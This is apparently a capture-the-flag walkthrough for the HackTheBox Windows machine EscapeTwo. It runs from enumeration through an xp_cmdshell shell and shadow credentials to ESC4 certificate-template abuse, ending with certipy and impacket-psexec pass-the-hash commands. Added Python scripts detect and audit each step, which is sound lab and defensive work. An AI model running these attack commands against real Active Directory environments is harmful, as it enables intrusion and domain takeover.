Box Info
  • Name: EscapeTwo
  • OS: Windows
  • Difficulty: Easy
  • IP: 10.10.11.51

Setup

mkdir -p ~/ctf/HackTheBox/escapetwo/scans; cd ~/ctf/HackTheBox/escapetwo

IP Address: 10.10.11.51

echo "10.10.11.51 escapetwo.htb" | sudo tee -a /etc/hosts

10.10.11.51 escapetwo.htb


Enumeration

nmap -sC -sV -Pn -p- escapetwo.htb -oN scans/nmap -vv
nmap -sC -sV -p- -T5 -vv --min-rate 2500 -oN scans/nmap_2 escapetwo.htb

# nmap findings

PORT      STATE SERVICE       REASON  VERSION
53/tcp    open  domain        syn-ack Simple DNS Plus
88/tcp    open  kerberos-sec  syn-ack Microsoft Windows Kerberos (server time: 2025-04-28 07:17:36Z)
135/tcp   open  msrpc         syn-ack Microsoft Windows RPC
139/tcp   open  netbios-ssn   syn-ack Microsoft Windows netbios-ssn
389/tcp   open  ldap          syn-ack Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.sequel.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.sequel.htb
| Issuer: commonName=sequel-DC01-CA/domainComponent=sequel
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-04-27T21:35:48
| Not valid after:  2026-04-27T21:35:48
| MD5:   2346:52c8:2638:d62f:3774:8ca0:c934:df6a
| SHA-1: 0392:dac1:1784:2df8:1f92:1efa:c143:f3d7:4efd:52c1
|_ssl-date: 2025-04-28T07:19:11+00:00; -19m58s from scanner time.
445/tcp   open  microsoft-ds? syn-ack
593/tcp   open  ncacn_http    syn-ack Microsoft Windows RPC over HTTP 1.0
636/tcp   open  ssl/ldap      syn-ack Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.sequel.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.sequel.htb
| Issuer: commonName=sequel-DC01-CA/domainComponent=sequel
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-04-27T21:35:48
| Not valid after:  2026-04-27T21:35:48
| MD5:   2346:52c8:2638:d62f:3774:8ca0:c934:df6a
| SHA-1: 0392:dac1:1784:2df8:1f92:1efa:c143:f3d7:4efd:52c1
|_ssl-date: 2025-04-28T07:19:11+00:00; -19m58s from scanner time.
1433/tcp  open  ms-sql-s      syn-ack Microsoft SQL Server 2019 15.00.2000.00; RTM
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Issuer: commonName=SSL_Self_Signed_Fallback
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-04-27T13:41:16
| Not valid after:  2055-04-27T13:41:16
| MD5:   4fcb:5a4e:53c7:ee55:1d4c:7a61:9688:9040
| SHA-1: 3be5:b199:6a61:a7d8:e08e:92a0:0d5c:1ffb:eb3c:86f4
| ms-sql-info: 
|   10.10.11.51:1433: 
|     Version: 
|       name: Microsoft SQL Server 2019 RTM
|       number: 15.00.2000.00
|       Product: Microsoft SQL Server 2019
|       Service pack level: RTM
|       Post-SP patches applied: false
|_    TCP port: 1433
| ms-sql-ntlm-info: 
|   10.10.11.51:1433: 
|     Target_Name: SEQUEL
|     NetBIOS_Domain_Name: SEQUEL
|     NetBIOS_Computer_Name: DC01
|     DNS_Domain_Name: sequel.htb
|     DNS_Computer_Name: DC01.sequel.htb
|     DNS_Tree_Name: sequel.htb
|_    Product_Version: 10.0.17763
|_ssl-date: 2025-04-28T07:19:14+00:00; -19m58s from scanner time.
3268/tcp  open  ldap          syn-ack Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-04-28T07:19:11+00:00; -19m58s from scanner time.
| ssl-cert: Subject: commonName=DC01.sequel.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.sequel.htb
| Issuer: commonName=sequel-DC01-CA/domainComponent=sequel
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-04-27T21:35:48
| Not valid after:  2026-04-27T21:35:48
| MD5:   2346:52c8:2638:d62f:3774:8ca0:c934:df6a
| SHA-1: 0392:dac1:1784:2df8:1f92:1efa:c143:f3d7:4efd:52c1
3269/tcp  open  ssl/ldap      syn-ack Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-04-28T07:19:11+00:00; -19m58s from scanner time.
| ssl-cert: Subject: commonName=DC01.sequel.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.sequel.htb
| Issuer: commonName=sequel-DC01-CA/domainComponent=sequel
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-04-27T21:35:48
| Not valid after:  2026-04-27T21:35:48
| MD5:   2346:52c8:2638:d62f:3774:8ca0:c934:df6a
| SHA-1: 0392:dac1:1784:2df8:1f92:1efa:c143:f3d7:4efd:52c1
5985/tcp  open  http          syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf        syn-ack .NET Message Framing
47001/tcp open  http          syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
49664/tcp open  msrpc         syn-ack Microsoft Windows RPC
49665/tcp open  msrpc         syn-ack Microsoft Windows RPC
49666/tcp open  msrpc         syn-ack Microsoft Windows RPC
49667/tcp open  msrpc         syn-ack Microsoft Windows RPC
49689/tcp open  ncacn_http    syn-ack Microsoft Windows RPC over HTTP 1.0
49690/tcp open  msrpc         syn-ack Microsoft Windows RPC
49693/tcp open  msrpc         syn-ack Microsoft Windows RPC
49706/tcp open  msrpc         syn-ack Microsoft Windows RPC
49722/tcp open  msrpc         syn-ack Microsoft Windows RPC
49743/tcp open  msrpc         syn-ack Microsoft Windows RPC
49811/tcp open  msrpc         syn-ack Microsoft Windows RPC
62060/tcp open  msrpc         syn-ack Microsoft Windows RPC
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
|_clock-skew: mean: -19m58s, deviation: 0s, median: -19m58s
| p2p-conficker: 
|   Checking for Conficker.C or higher...
|   Check 1 (port 62012/tcp): CLEAN (Timeout)
|   Check 2 (port 18505/tcp): CLEAN (Timeout)
|   Check 3 (port 20179/udp): CLEAN (Timeout)
|   Check 4 (port 46639/udp): CLEAN (Timeout)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked
| smb2-time: 
|   date: 2025-04-28T07:18:33
|_  start_date: N/A

cme smb escapetwo.htb -u 'rose' -p 'KxEPkKe6R8su' --users

# Enumerated users
ca_svc
rose
sql_svc
oscar
ryan
michael
krbtgt
Guest
Administrator

SMB Shares:

SMB         10.10.11.51     445    DC01             [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:sequel.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.51     445    DC01             [+] sequel.htb\rose:KxE**************** 
SMB         10.10.11.51     445    DC01             [*] Enumerated shares
SMB         10.10.11.51     445    DC01             Share           Permissions     Remark
SMB         10.10.11.51     445    DC01             -----           -----------     ------
SMB         10.10.11.51     445    DC01             Accounting Department READ            
SMB         10.10.11.51     445    DC01             ADMIN$                          Remote Admin
SMB         10.10.11.51     445    DC01             C$                              Default share
SMB         10.10.11.51     445    DC01             IPC$            READ            Remote IPC
SMB         10.10.11.51     445    DC01             NETLOGON        READ            Logon server share 
SMB         10.10.11.51     445    DC01             SYSVOL          READ            Logon server share 
SMB         10.10.11.51     445    DC01             Users           READ            

When I tried opening these files in Excel, it reported them as corrupt, which led me to check the file type: they are actually ZIP archives.

Unzipping them revealed an XML file containing a table of credentials. Using those passwords, two more valid credentials were found:

oscar:86****************
sa:MS****************
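
As an added illustration (not part of the original writeup), the following Python checks a file's real type from its leading bytes rather than its extension and pulls the text cells out of an .xlsx, which is a ZIP container of XML parts. The workbook it inspects is a constructed minimal stand-in for the share's files, and every string in it is a placeholder.

```python
import io
import zipfile
import xml.etree.ElementTree as ET

# Leading bytes that identify common document containers, regardless of extension.
SIGNATURES = {
    b"PK\x03\x04": "zip (OOXML: .xlsx/.docx/.pptx are ZIP containers)",
    b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1": "ole2 (legacy .xls/.doc)",
    b"%PDF-": "pdf",
}

SML_NS = "http://schemas.openxmlformats.org/spreadsheetml/2006/main"


def identify(data: bytes) -> str:
    """Classify a file by its magic bytes; 'unknown' if no signature matches."""
    for magic, kind in SIGNATURES.items():
        if data.startswith(magic):
            return kind
    return "unknown"


def list_members(data: bytes) -> list[str]:
    """Names of the parts inside an OOXML (ZIP) container."""
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        return zf.namelist()


def shared_strings(data: bytes) -> list[str]:
    """Return every text cell of an .xlsx from its shared-string table.

    OOXML stores each distinct text cell once in xl/sharedStrings.xml and the
    sheets reference it by index, so this one part exposes all textual content.
    """
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        if "xl/sharedStrings.xml" not in zf.namelist():
            return []
        root = ET.fromstring(zf.read("xl/sharedStrings.xml"))
    tag_t = f"{{{SML_NS}}}t"
    return [
        "".join(t.text or "" for t in si.iter(tag_t))
        for si in root.findall(f"{{{SML_NS}}}si")
    ]


def build_sample_workbook() -> bytes:
    """Constructed minimal .xlsx: a stand-in for the share's files, not the real ones."""
    sst = (
        '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
        f'<sst xmlns="{SML_NS}" count="4" uniqueCount="4">'
        "<si><t>Username</t></si><si><t>Password</t></si>"
        "<si><t>example.user</t></si><si><t>Example-Pass-123</t></si>"
        "</sst>"
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("[Content_Types].xml", '<?xml version="1.0"?><Types/>')
        zf.writestr("xl/workbook.xml", f'<workbook xmlns="{SML_NS}"/>')
        zf.writestr("xl/sharedStrings.xml", sst)
    return buf.getvalue()


if __name__ == "__main__":
    blob = build_sample_workbook()
    print("type:", identify(blob))
    print("parts:", list_members(blob))
    for s in shared_strings(blob):
        print("cell text:", s)
```

Because text cells live in one XML part, a workbook's content can be read without a spreadsheet library; on a share review this is also the quickest way to spot documents that keep credentials in plain cells.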

Testing these, sa turned out to be an MSSQL admin.

With sa, we use mssqlclient to run enable_xp_cmdshell and get a reverse PowerShell shell:
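
From the defender's side, enabling xp_cmdshell this way leaves two clear traces: sp_configure writes a line to the SQL Server ERRORLOG, and the spawned shell is a child process of sqlservr.exe running as the SQL service account. The Python below is an added example (not from the writeup) that runs both detections over constructed sample data: an ERRORLOG excerpt whose message text mirrors the real one, and process-creation records using Sysmon event 1 field names. The instance path and the SEQUEL\sql_svc service account in the samples are assumptions.

```python
import re

# Constructed SQL Server ERRORLOG excerpt; the message text matches what
# sp_configure writes when a server option is changed.
ERRORLOG = """\
2025-04-28 07:20:01.10 spid51      Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.
2025-04-28 07:20:01.12 spid51      Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.
2025-04-28 07:25:13.44 spid52      Configuration option 'max degree of parallelism' changed from 0 to 4. Run the RECONFIGURE statement to install.
"""

CONFIG_RE = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2} [\d:.]+) (?P<spid>spid\d+)\s+"
    r"Configuration option '(?P<option>[^']+)' changed from (?P<old>\d+) to (?P<new>\d+)\."
)

# Server options that turn the database engine into a code-execution host.
DANGEROUS_OPTIONS = {"xp_cmdshell", "Ole Automation Procedures", "clr enabled"}

# Interpreters that sqlservr.exe has no business spawning.
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "mshta.exe"}

# Constructed process-creation records using Sysmon event 1 field names.
# The instance path and the SEQUEL\sql_svc service account are assumptions.
PROCESS_EVENTS = [
    {"ParentImage": r"C:\Program Files\Microsoft SQL Server\MSSQL15.MSSQLSERVER\MSSQL\Binn\sqlservr.exe",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r'"cmd.exe" /c powershell -nop -w hidden -enc <base64 omitted>',
     "User": r"SEQUEL\sql_svc"},
    {"ParentImage": r"C:\Program Files\Microsoft SQL Server\MSSQL15.MSSQLSERVER\MSSQL\Binn\sqlservr.exe",
     "Image": r"C:\Program Files\Microsoft SQL Server\MSSQL15.MSSQLSERVER\MSSQL\Binn\SQLDumper.exe",
     "CommandLine": r'"SQLDumper.exe" 1234 0 0x0120',
     "User": r"SEQUEL\sql_svc"},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r'"cmd.exe"',
     "User": r"SEQUEL\ryan"},
]


def errorlog_alerts(text: str) -> list[dict]:
    """Flag ERRORLOG lines that enable a dangerous server option (new value != 0)."""
    alerts = []
    for line in text.splitlines():
        m = CONFIG_RE.match(line)
        if m and m["option"] in DANGEROUS_OPTIONS and m["new"] != "0":
            alerts.append({"ts": m["ts"], "spid": m["spid"], "option": m["option"]})
    return alerts


def basename(path: str) -> str:
    """Lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def process_alerts(events: list[dict]) -> list[dict]:
    """Flag shell interpreters whose parent process is the SQL Server engine."""
    alerts = []
    for ev in events:
        if basename(ev["ParentImage"]) == "sqlservr.exe" and basename(ev["Image"]) in SHELLS:
            alerts.append({"user": ev["User"], "child": basename(ev["Image"]),
                           "cmdline": ev["CommandLine"]})
    return alerts


if __name__ == "__main__":
    for a in errorlog_alerts(ERRORLOG):
        print(f"[ERRORLOG] {a['ts']} {a['spid']} enabled {a['option']}")
    for a in process_alerts(PROCESS_EVENTS):
        print(f"[PROCESS] sqlservr.exe spawned {a['child']} as {a['user']}: {a['cmdline']}")
```

The ERRORLOG check catches the configuration change even if the shell itself is never seen; the process check catches the execution even if the option was enabled long ago. Keeping xp_cmdshell disabled and not handing the sa account to applications removes the precondition for both.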

In the SQL Server configuration file we found a password:

A password spray showed that this same password is also used by the user ryan:

Using cme to enumerate services, we find WinRM is enabled:


User Flag

Location: C:\Users\ryan\Desktop\user.txt | Flag:1a****************

Privilege Escalation

Using the obtained credentials for Ryan, we run rusthound to collect BloodHound data. We also try Kerberoasting, but the hashes couldn't be cracked with rockyou:

Then in BloodHound we find:

Shadow Credentials attack: a Shadow Credentials attack is a technique used by attackers to gain persistence and elevate privileges in a Windows Active Directory (AD) environment without leaving obvious traces such as new user accounts or group memberships. Instead, it abuses a legitimate feature: the msDS-KeyCredentialLink attribute (Key Credential Link) used in certificate-based authentication (e.g., PKINIT for Kerberos or Windows Hello for Business). Anyone with write access to that attribute on a target account can add a key pair of their own and then authenticate as that account.

Pywhisker was used for this attack:

ca_svc:3b1****************
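
Shadow credential writes show up in Security event 5136 (a directory service object was modified) when "Audit Directory Service Changes" is enabled and the user objects carry a SACL covering msDS-KeyCredentialLink. As an added example (not part of the writeup), the Python below scans constructed 5136 records and rates each key-credential write by who performed it: a provisioning account, the account itself, or a third party writing a key onto someone else's object, which is the pattern of the step above. The event field names are the real 5136 ones; the sample values, the DNs and the MSOL_ allowlist are assumptions, and the ryan-to-ca_svc record simply mirrors the path this writeup followed.

```python
import re

KEYCRED_ATTR = "msDS-KeyCredentialLink"
# OperationType codes used by event 5136.
VALUE_ADDED = "%%14674"
VALUE_DELETED = "%%14675"

# Accounts allowed to write key credentials on behalf of others (constructed allowlist).
# Azure AD Connect's sync account is named MSOL_<hex> by default; extend for your environment.
PROVISIONING_RE = re.compile(r"^MSOL_[0-9a-f]+$", re.IGNORECASE)

# Constructed 5136 records (field names as in the Security log; values are assumptions).
EVENTS = [
    {"EventID": 5136, "SubjectUserName": "ryan", "SubjectDomainName": "SEQUEL",
     "ObjectDN": "CN=ca_svc,CN=Users,DC=sequel,DC=htb", "ObjectClass": "user",
     "AttributeLDAPDisplayName": KEYCRED_ATTR, "OperationType": VALUE_ADDED,
     "AttributeValue": "B:828:<DN-binary key blob omitted>:CN=ca_svc,CN=Users,DC=sequel,DC=htb"},
    {"EventID": 5136, "SubjectUserName": "oscar", "SubjectDomainName": "SEQUEL",
     "ObjectDN": "CN=oscar,CN=Users,DC=sequel,DC=htb", "ObjectClass": "user",
     "AttributeLDAPDisplayName": KEYCRED_ATTR, "OperationType": VALUE_ADDED,
     "AttributeValue": "B:828:<DN-binary key blob omitted>:CN=oscar,CN=Users,DC=sequel,DC=htb"},
    {"EventID": 5136, "SubjectUserName": "MSOL_0a1b2c3d4e5f", "SubjectDomainName": "SEQUEL",
     "ObjectDN": "CN=michael,CN=Users,DC=sequel,DC=htb", "ObjectClass": "user",
     "AttributeLDAPDisplayName": KEYCRED_ATTR, "OperationType": VALUE_ADDED,
     "AttributeValue": "B:828:<DN-binary key blob omitted>:CN=michael,CN=Users,DC=sequel,DC=htb"},
    {"EventID": 5136, "SubjectUserName": "ryan", "SubjectDomainName": "SEQUEL",
     "ObjectDN": "CN=ryan,CN=Users,DC=sequel,DC=htb", "ObjectClass": "user",
     "AttributeLDAPDisplayName": "description", "OperationType": VALUE_ADDED,
     "AttributeValue": "Helpdesk"},
]


def cn_of(dn: str) -> str:
    """First RDN value of a DN, e.g. 'ca_svc' from 'CN=ca_svc,CN=Users,...'."""
    m = re.match(r"CN=([^,]+)", dn, re.IGNORECASE)
    return m.group(1) if m else dn


def rate(actor: str, target: str) -> str:
    """Severity of a key-credential write based on who wrote it."""
    if PROVISIONING_RE.match(actor):
        return "info"       # expected provisioning account
    if actor.rstrip("$").lower() == target.rstrip("$").lower():
        return "low"        # account enrolling its own key (Windows Hello for Business style)
    return "high"           # someone else adding a key to the object: shadow credentials pattern


def shadow_credential_alerts(events: list[dict]) -> list[dict]:
    """Select 5136 'Value Added' events on msDS-KeyCredentialLink and rate them."""
    alerts = []
    for ev in events:
        if ev.get("EventID") != 5136 or ev.get("AttributeLDAPDisplayName") != KEYCRED_ATTR:
            continue
        if ev.get("OperationType") != VALUE_ADDED:
            continue        # deletions are worth logging but are not the attack signal
        actor, target = ev["SubjectUserName"], cn_of(ev["ObjectDN"])
        alerts.append({"actor": f"{ev['SubjectDomainName']}\\{actor}", "target": target,
                       "severity": rate(actor, target)})
    return alerts


if __name__ == "__main__":
    for a in shadow_credential_alerts(EVENTS):
        print(f"[{a['severity'].upper()}] {a['actor']} wrote {KEYCRED_ATTR} on {a['target']}")
```

The "high" case is the one to page on: a user account writing a key credential onto a different account. The fix on the object side is to remove the write right that BloodHound exposed (GenericWrite, GenericAll or WriteProperty on msDS-KeyCredentialLink) from principals that do not need it.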

To check for password reuse, we spray the hash against all usernames:

As the ca_svc account belongs to Certificate Publishers, we use certipy to look for ADCS vulnerabilities:

Following ADCS Exploitation Part 1: Common Attacks, we exploit ESC4 by modifying the template with certipy (-save-old keeps a copy of the original template configuration):

certipy template -u ca_svc@sequel.htb -template DunderMifflinAuthentication -save-old -hashes 3b**************** -dc-ip 10.10.11.51

Then we request a certificate from the modified template with the administrator UPN and authenticate with it to obtain the administrator NT hash:

certipy req -username 'ca_svc@sequel.htb' -hashes 3b**************** -ca sequel-DC01-CA -target DC01.sequel.htb -dc-ip 10.10.11.51 -template DunderMifflinAuthentication -upn administrator@sequel.htb

certipy auth -pfx administrator.pfx -dc-ip 10.10.11.51
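
To show why write access to a template is as serious as the chain above, here is an added Python audit (not the writeup's or certipy's code) that flags ESC4 (a principal outside tier 0 can modify the template) and ESC1 (a principal outside tier 0 can enroll, supply its own subject, and receive an authentication-capable certificate with no approval). The flag bits and EKU OIDs are the real ADCS values; the template records are constructed: the "before" and "after" states of DunderMifflinAuthentication assume Cert Publishers holds the write right and mirror what the certipy template step changes, and are not the box's real ACLs.

```python
from dataclasses import dataclass

# msPKI-Certificate-Name-Flag bit: the requester supplies the subject/SAN.
CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT = 0x00000001
# msPKI-Enrollment-Flag bit: requests wait for CA manager approval.
CT_FLAG_PEND_ALL_REQUESTS = 0x00000002

# EKUs that make a certificate usable for domain authentication.
AUTH_EKUS = {
    "1.3.6.1.5.5.7.3.2",       # Client Authentication
    "1.3.6.1.4.1.311.20.2.2",  # Smart Card Logon
    "1.3.6.1.5.2.3.4",         # PKINIT Client Authentication
    "2.5.29.37.0",             # Any Purpose
}

# Principals expected to own template configuration; anything else is reported.
TIER0 = {"Domain Admins", "Enterprise Admins", "Administrators"}


@dataclass
class Template:
    name: str
    published: bool            # listed in a CA's certificateTemplates attribute
    name_flag: int             # msPKI-Certificate-Name-Flag
    enrollment_flag: int       # msPKI-Enrollment-Flag
    ra_signatures: int         # msPKI-RA-Signature (authorized signatures required)
    ekus: set                  # pKIExtendedKeyUsage; empty set means any purpose
    enroll: set                # principals with the Enroll extended right
    write: set                 # principals with WriteDacl/WriteOwner/WriteProperty on the object


def allows_authentication(t: Template) -> bool:
    """No EKU at all, or at least one authentication EKU."""
    return not t.ekus or bool(t.ekus & AUTH_EKUS)


def audit(t: Template) -> list:
    """Return (code, offending principals) pairs for ESC1 and ESC4."""
    findings = []
    if not t.published:
        return findings
    no_approval = not (t.enrollment_flag & CT_FLAG_PEND_ALL_REQUESTS) and t.ra_signatures == 0
    low_priv_enroll = t.enroll - TIER0
    if (t.name_flag & CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT) and allows_authentication(t) \
            and no_approval and low_priv_enroll:
        findings.append(("ESC1", sorted(low_priv_enroll)))
    low_priv_write = t.write - TIER0
    if low_priv_write:
        findings.append(("ESC4", sorted(low_priv_write)))
    return findings


# Constructed states; the ACLs are assumptions, not the box's real configuration.
BEFORE = Template("DunderMifflinAuthentication", True, 0x0, 0x0, 0,
                  {"1.3.6.1.5.5.7.3.2"}, {"Domain Admins"},
                  {"Domain Admins", "Cert Publishers"})
# The same template after a writer turns it into an ESC1 template.
AFTER = Template("DunderMifflinAuthentication", True, CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT, 0x0, 0,
                 {"1.3.6.1.5.5.7.3.2"}, {"Domain Users"},
                 {"Domain Admins", "Cert Publishers"})
# A User-style template: subject built from AD, so Domain Users enrolling is fine.
USER = Template("User", True, 0x0, 0x0, 0,
                {"1.3.6.1.5.5.7.3.2", "1.3.6.1.5.5.7.3.4"},
                {"Domain Users"}, {"Domain Admins", "Enterprise Admins"})


if __name__ == "__main__":
    for t in (BEFORE, AFTER, USER):
        print(t.name, audit(t) or "clean")
```

The "before" record is clean on ESC1 yet already reports ESC4, which is the whole point: a template that is harmless today can be rewritten into an ESC1 template by whoever holds the write right, so the remediation is to restore the saved configuration and remove that right, not only to undo the ESC1 flags.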

Using psexec with that hash we get a shell:

impacket-psexec -hashes aad3b435b51404eeaad3b435b51404ee:7a8d4**************** -target-ip 10.10.11.51 administrator@sequel.htb


Root Flag

Location: c:\Users\Administrator\Desktop\root.txt | Flag: 85b****************